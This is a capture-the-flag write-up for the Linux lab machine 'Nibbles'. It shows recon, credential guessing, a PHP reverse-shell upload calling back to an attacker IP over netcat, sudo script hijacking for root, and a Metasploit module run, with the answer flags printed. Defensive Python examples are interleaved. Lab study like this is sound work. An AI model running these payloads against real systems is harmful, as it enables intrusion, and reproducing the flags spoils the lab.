Nibbles (Easy)

Description

  • Difficulty -> Easy

  • OS -> Linux

  • State -> Retired

  • Tags -> Vulnerability Assessment / Web Application / Security Tools / Software & OS Exploitation / Remote Code Execution / Default Credentials

Write-up

  • I started with an initial port scan using Nmap

nmap 10.129.93.176 -p- -Pn --min-rate 2500 -oN scan.txt

  • Then I ran a more exhaustive scan to learn about the services running on the open ports

nmap 10.129.93.176 -p22,80 -sVC -oN serv_scan.txt

  • I found HTTP running on port 80, so I opened the site in the browser to check what was being served. All I saw was a page with a message, so I reviewed the source code to find out more


  • There I found a comment revealing another page under the /nibbleblog route, so I navigated there and found a blog-style page that I could explore


  • After exploring the page, I didn't find anything relevant; the only hint the site gave me was that it was powered by the Nibbleblog CMS. So, in an attempt to find hidden directories or routes, I fuzzed the route with the help of gobuster and a wordlist from SecLists

gobuster dir -u http://10.129.93.176/nibbleblog -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -o fuzz.txt

  • I found some interesting routes, the most relevant being /admin.php, so I navigated there and found a simple login page. I tried logging in with common credentials, but it didn't work


  • I needed a username and password I could log in with, so I went back and checked the other routes I had found, looking for this information. I noticed there was a /content route, so I went there to explore it


  • There I found some exposed folders, so I explored the files they contained. After examining them I found an interesting file at /content/private/users.xml and accessed it, and noticed this XML document was leaking some information


  • That told me there was an existing user named admin, but it gave me no information about a related password, so I kept searching through the files. Then I checked the config.xml file and noticed the word nibbles was used many times


  • Even the domain of an email address used this word, which could mean it was the company name, making it a possible weak password. I tried logging in on the /admin.php page using admin as the username and nibbles as the password, and it let me in to a new dashboard
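The password that opened the dashboard was nothing more than the site's own name, which showed up repeatedly in config.xml. A defender can enforce the opposite rule when a password is set: reject anything built from terms that appear in the deployment's own metadata (site name, slogan, e-mail domain, hostname). The Python script below is an added example and is not code from this write-up or from the Nibbleblog project; the config XML it parses is a constructed sample with placeholder values, and the leet-substitution table and the 12-character minimum are assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample in the spirit of a CMS config.xml; the values are
# illustrative placeholders, not the contents of the file found on the box.
SAMPLE_CONFIG = """<?xml version="1.0"?>
<config>
  <name>Nibbles</name>
  <slogan>Yum yum</slogan>
  <notification_email_to>admin@nibbles.com</notification_email_to>
  <url>http://nibbles.example/nibbleblog/</url>
</config>
"""

# Common single-character substitutions folded back to letters before matching
# (assumed table; extend it to taste).
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s", "@": "a", "$": "s"})
# Tokens that appear in every config and carry no site-specific meaning.
NOISE = {"http", "https", "www", "html", "php", "mail"}


def harvest_terms(config_xml, min_len=4):
    """Collect lowercase tokens from every text node: site name, slogan words,
    e-mail local parts and domain labels, URL hostnames and path segments."""
    terms = set()
    for element in ET.fromstring(config_xml).iter():
        text = (element.text or "").strip().lower()
        for token in re.split(r"[^a-z0-9]+", text):
            if len(token) >= min_len and token not in NOISE:
                terms.add(token)
    return terms


def normalise(password):
    """Lower-case, undo leet substitutions and drop digits/punctuation so that
    'N1bbl3s2024!' and 'nibbles' compare equal."""
    return re.sub(r"[^a-z]", "", password.lower().translate(LEET))


def check_password(password, terms, min_len=12):
    """Return a list of policy violations; an empty list means the password passes."""
    problems = []
    if len(password) < min_len:
        problems.append(f"shorter than {min_len} characters")
    core = normalise(password)
    # Longest term first so 'nibbleblog' is reported rather than 'nibbles'.
    for term in sorted(terms, key=len, reverse=True):
        if core and term in core:
            problems.append(f"derived from site term '{term}'")
            break
    return problems


if __name__ == "__main__":
    site_terms = harvest_terms(SAMPLE_CONFIG)
    for candidate in ("nibbles", "N1bbl3s2024!", "correct horse battery staple"):
        print(candidate, "->", check_password(candidate, site_terms) or "ok")
```

The harvested terms are meant to be combined with a generic breached-password list; this check only closes the specific gap shown here, a password that an attacker can read straight out of the application's configuration.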


  • After that, I explored the sections of the page looking for any possible vulnerability. As I didn't find anything at first sight, I searched for known CVEs for this CMS. After a little research, I found a repository with an exploit for CVE-2015-6967, which affects this CMS. It would let me abuse a file upload vulnerability to gain a reverse shell, but first I needed to find a place where I could upload a file


  • So I kept looking for an option that would let me upload a file to the system and abuse the vulnerability. After a while, I found a Plugins section that looked interesting, because plugins can sometimes be added from external sources, so I accessed it


  • There I found some already installed plugins, and after exploring them, the My Image plugin caught my attention because it had an option to upload a picture file, a point that I could abuse


  • To do so, I could create a reverse shell script and upload it in this section. I also confirmed with Wappalyzer that the page is built on PHP, so I wrote a basic script in that language with the payload and uploaded it

RevShell.php
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.80 4444 >/tmp/f"); ?>

  • I saw a couple of warnings, but the page told me that the file had been uploaded successfully. Then I had to find the location where uploaded files were stored in order to execute it. I went back to searching and, after a while, found a folder named plugins under the /content/private folder. There I found another folder related to the My Image plugin, so I went in to check its contents


  • Unfortunately, I found a PHP file named image.php, but it wasn't the one I had uploaded. Maybe the name had been changed automatically by the web application, so I worked on the assumption that this single file was the one containing my reverse shell payload. To confirm this, I started a Netcat listener on my machine on the port specified in the script and then accessed the file

nc -nvlp 4444

  • I observed that the page kept loading, and checking the listener I noticed I had successfully caught the shell from the web server. Then I stabilized the terminal and checked which user I was with the whoami command, which told me I was the nibbler user
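Seen from the server side, the whole chain above leaves a recognisable trail in the web server's access log: a burst of 404s from the directory brute force, reads of users.xml and config.xml under /content/private, a POST to admin.php, and finally a request for a .php file inside the plugin upload directory. The Python detector below is an added example and not part of this write-up; the log lines are constructed, the client addresses are documentation-range placeholders, and the plugin directory name my_image is an assumption based on the My Image plugin mentioned above.

```python
import re
from collections import Counter

# Apache/nginx combined-format access log; only the leading fields are needed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# Paths are the ones visited in the write-up. The plugin directory name
# "my_image" is an assumption derived from the "My Image" plugin mentioned there.
PRIVATE_XML = re.compile(r"/content/private/[^/]+\.xml$", re.I)
PLUGIN_PHP = re.compile(r"/content/private/plugins/[^/]+/[^/]+\.php$", re.I)
ADMIN_PAGE = re.compile(r"/admin\.php$", re.I)
NOT_FOUND_BURST = 5  # 404s from one client before flagging directory enumeration

# Constructed log lines reproducing the sequence of the write-up: a wordlist
# burst of 404s, reads of the private XML files, a POST to the admin page and a
# request for a PHP file inside the plugin directory. 203.0.113.0/24 and
# 198.51.100.0/24 are documentation address ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2024:10:00:01 +0000] "GET /nibbleblog/ HTTP/1.1" 200 2345
203.0.113.5 - - [10/Jan/2024:10:00:02 +0000] "GET /nibbleblog/guess1 HTTP/1.1" 404 290
203.0.113.5 - - [10/Jan/2024:10:00:02 +0000] "GET /nibbleblog/guess2 HTTP/1.1" 404 290
203.0.113.5 - - [10/Jan/2024:10:00:02 +0000] "GET /nibbleblog/guess3 HTTP/1.1" 404 290
203.0.113.5 - - [10/Jan/2024:10:00:03 +0000] "GET /nibbleblog/guess4 HTTP/1.1" 404 290
203.0.113.5 - - [10/Jan/2024:10:00:03 +0000] "GET /nibbleblog/guess5 HTTP/1.1" 404 290
203.0.113.5 - - [10/Jan/2024:10:00:10 +0000] "GET /nibbleblog/content/private/users.xml HTTP/1.1" 200 512
203.0.113.5 - - [10/Jan/2024:10:00:12 +0000] "GET /nibbleblog/content/private/config.xml HTTP/1.1" 200 1024
198.51.100.7 - - [10/Jan/2024:10:00:30 +0000] "GET /nibbleblog/index.php HTTP/1.1" 200 3000
203.0.113.5 - - [10/Jan/2024:10:01:00 +0000] "POST /nibbleblog/admin.php HTTP/1.1" 200 900
203.0.113.5 - - [10/Jan/2024:10:01:10 +0000] "GET /nibbleblog/content/private/plugins/my_image/image.php HTTP/1.1" 200 0
"""


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]  # ignore the query string
    return rec


def detect(lines):
    """Scan log lines in order and return (client, rule, path) alerts."""
    alerts = []
    posted_admin = set()   # clients that have submitted something to admin.php
    not_found = Counter()  # 404 count per client
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path, status = rec["ip"], rec["path"], rec["status"]
        if status == "404":
            not_found[ip] += 1
            if not_found[ip] == NOT_FOUND_BURST:
                alerts.append((ip, "enumeration-burst", path))
        if status == "200" and PRIVATE_XML.search(path):
            # These files should never be served; a 200 means the web server
            # is exposing the CMS's private content directory.
            alerts.append((ip, "private-xml-read", path))
        if rec["method"] == "POST" and ADMIN_PAGE.search(path):
            posted_admin.add(ip)
        if status == "200" and PLUGIN_PHP.search(path):
            # A PHP file executing from an upload directory is the smoking gun;
            # a prior admin POST from the same client raises the severity.
            rule = "plugin-php-after-admin-post" if ip in posted_admin else "plugin-php-request"
            alerts.append((ip, rule, path))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(*alert)
```

The two file-based rules are also the mitigation list: deny web access to /content/private entirely and disable PHP execution under the upload directories, after which the same requests show up as 403s instead of 200s.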


  • Then I navigated to the /home folder, where I found a folder for this user and, inside it, a user.txt file from which I got the user flag


  • With that, I got the user flag

Answer: 0ac28aeb5d1e8d1808cdd083961381ad


  • After that, I had to search for a way to escalate privileges. I checked the user's sudo permissions and saw it was allowed to execute a monitor.sh file, but after searching the filesystem I couldn't find it


  • Looking again at the contents of the /home/nibbler folder, I noticed a suspicious zip file, so I decompressed it and checked its contents, which gave me the monitor.sh file I was looking for


  • Knowing this, I tried modifying the script's content to spawn a shell. I replaced it and checked that it had been saved correctly, which the system let me do without issues. Then I ran the script with sudo and gained a shell as the root user

echo '/bin/bash' > monitor.sh
sudo /monitor.sh
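The escalation works because the sudo rule points at a script the user can replace: it lived under the user's own home directory and at first did not even exist. Auditing sudoers for that condition is mechanical: for every command path, check whether the sudoer owns it, can write it, or can write its parent directory (which lets them plant a missing script or swap an existing one). The Python script below is an added example and not from this write-up; it builds a constructed directory layout in a temporary folder, models the sudoer "nibbler" as the current uid, and the sudoers fragment, user names and paths it uses are placeholders.

```python
import os
import re
import shutil
import stat
import tempfile

# One sudoers rule: user host=(runas) [TAG:] cmd[, cmd...]. Simplified on
# purpose: aliases and per-command tags are not handled.
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*"
    r"(?P<tags>(?:(?:NOPASSWD|PASSWD|SETENV|NOSETENV):\s*)*)(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Return a list of {user, runas, nopasswd, cmds} dicts from sudoers text."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if m is None:
            continue
        # Keep only the executable of each comma-separated command entry.
        cmds = [c.strip().split()[0] for c in m["cmds"].split(",") if c.strip()]
        rules.append({"user": m["user"], "runas": m["runas"] or "root",
                      "nopasswd": "NOPASSWD:" in m["tags"], "cmds": cmds})
    return rules


def _write_reasons(st, uid, gids):
    """Why a file/dir with stat result `st` is modifiable by uid/gids."""
    reasons = []
    if st.st_uid == uid:
        reasons.append("owned-by-sudoer")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    if st.st_mode & stat.S_IWGRP and st.st_gid in gids:
        reasons.append("group-writable-by-sudoer")
    return reasons


def audit_path(path, sudoer_uid, sudoer_gids):
    """Return the reasons a sudo-allowed command could be controlled by the sudoer."""
    if path == "ALL":
        return ["ALL: unrestricted"]
    findings = []
    if os.path.lexists(path):
        findings += _write_reasons(os.lstat(path), sudoer_uid, sudoer_gids)
    else:
        findings.append("missing")
    parent = os.path.dirname(path) or "/"
    if os.path.isdir(parent) and _write_reasons(os.stat(parent), sudoer_uid, sudoer_gids):
        # The sudoer can create, delete or rename entries here, so a missing
        # script can be planted and an existing one replaced.
        findings.append("parent-dir-writable-by-sudoer")
    return findings


def demo():
    """Audit a constructed sudoers fragment against a constructed file layout.
    "nibbler" is modelled as the current uid (so files created here count as
    owned by the sudoer); "backup" as a uid that owns nothing in the layout."""
    me, my_gid = os.getuid(), os.getgid()
    root = tempfile.mkdtemp()
    try:
        home_script = os.path.join(root, "home", "nibbler", "monitor.sh")
        missing_script = os.path.join(root, "home", "nibbler", "missing.sh")
        sbin_script = os.path.join(root, "usr", "local", "sbin", "monitor.sh")
        for script in (home_script, sbin_script):
            os.makedirs(os.path.dirname(script), mode=0o755)
            with open(script, "w") as f:
                f.write("#!/bin/bash\necho monitoring\n")
            os.chmod(script, 0o755)
        sudoers = f"""
        # constructed fragment; paths point into the temporary layout
        Defaults env_reset
        nibbler ALL=(root) NOPASSWD: {home_script}, {missing_script}
        backup  ALL=(root) NOPASSWD: {sbin_script}
        ops     ALL=(ALL) ALL
        """
        report = {}
        for rule in parse_sudoers(sudoers):
            uid = me if rule["user"] == "nibbler" else me + 100000
            gids = {my_gid} if rule["user"] == "nibbler" else set()
            for cmd in rule["cmds"]:
                report[(rule["user"], os.path.basename(cmd))] = audit_path(cmd, uid, gids)
        return report
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for key, findings in demo().items():
        print(key, "->", findings or "ok")
```

On a real host, point parse_sudoers at /etc/sudoers and the files under /etc/sudoers.d (or at the output of sudo -l) and resolve each user to its uid and group set; any finding other than an empty list means the rule grants more than it appears to.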

  • Finally, I navigated to the /root folder, where I found a root.txt file, and reading its contents I got the root flag


  • With that, I got the root flag and pwned the machine

Answer: 817daf6a75543a65762c919ecc5bcb94

Alternative using Metasploit

  • Instead of searching the web, I could check for known vulnerabilities using Metasploit. First I started it and searched for modules related to nibbleblog

msfconsole
msf6 > search nibbleblog

  • I found that an exploit for a file upload vulnerability existed, so I entered the context of this exploit and found out which parameters I needed to run it

msf6 > use exploit/multi/http/nibbleblog_file_upload
msf6 exploit(multi/http/nibbleblog_file_upload) > show options

  • I provided the required parameters and ran the exploit

msf6 exploit(multi/http/nibbleblog_file_upload) > set LHOST 10.10.14.80
msf6 exploit(multi/http/nibbleblog_file_upload) > set LPORT 4444
msf6 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin
msf6 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
msf6 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS 10.129.93.176
msf6 exploit(multi/http/nibbleblog_file_upload) > set TARGETURI /nibbleblog
msf6 exploit(multi/http/nibbleblog_file_upload) > run

  • After a while, I observed that a Meterpreter session had spawned, giving me a shell as the user nibbler. From there I could continue with the rest of the process
